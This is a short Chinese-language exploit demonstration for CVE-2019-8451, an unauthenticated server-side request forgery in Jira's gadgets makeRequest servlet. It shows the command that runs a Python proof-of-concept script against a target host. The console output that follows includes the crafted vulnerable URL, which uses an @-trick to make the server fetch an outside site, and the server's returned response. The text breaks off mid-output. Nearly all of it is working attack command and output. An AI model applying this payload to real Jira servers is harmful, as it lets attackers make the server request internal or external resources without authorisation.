# CVE-2019-8451 Jira未授权SSRF漏洞
## python usage
脚本github获取
`python CVE-2019-8451.py http://www.jas502n.com:8080`

“`
root@kali:~/CVE-2019-8451# python CVE-2019-8451.py http://www.jas502n.com:8080
>>>>SSRF URL: www.baidu.com
>>>>Send poc Success!
X-AUSERNAME= anonymous
>>>>vuln_url= http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com
throw 1; < don't be evil' >{“http://www.jas502n.com:8080@www.baidu.com”:{“rc”:200,”headers”:{“set-cookie”:[“BDORZ=27315; max-age=86400; domain=.baidu.com; path=/”]},”body”:”\r\n
<\/div>
